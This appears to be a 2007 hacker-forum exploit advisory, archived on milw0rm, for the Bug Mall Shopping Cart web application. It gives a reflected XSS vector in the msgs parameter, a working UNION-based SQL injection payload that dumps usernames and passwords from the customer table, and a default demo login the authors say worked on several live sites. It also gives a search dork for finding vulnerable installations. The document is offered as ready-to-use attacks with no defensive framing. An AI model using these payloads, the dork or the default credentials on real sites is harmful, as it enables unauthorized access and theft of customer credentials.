--==+================================================================================+==-- --==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D) SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834 SITE: http://www.bug-mall.org DORK: Powered by Bug Software intext:Your Cart Contains EXPLOITS: EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT] EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail. EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites and sucsefully logged in. EXAMPLES: EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=VULN BY
t0pP8uZz
h4cky0u.org EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs= EXAMPLE 3: Paste following into search box ' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/* Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION. GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net FROM GM!: Kw3[R]ln get over it :D. --==+================================================================================+==-- --==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==-- --==+================================================================================+==-- # milw0rm.com [2007-06-25]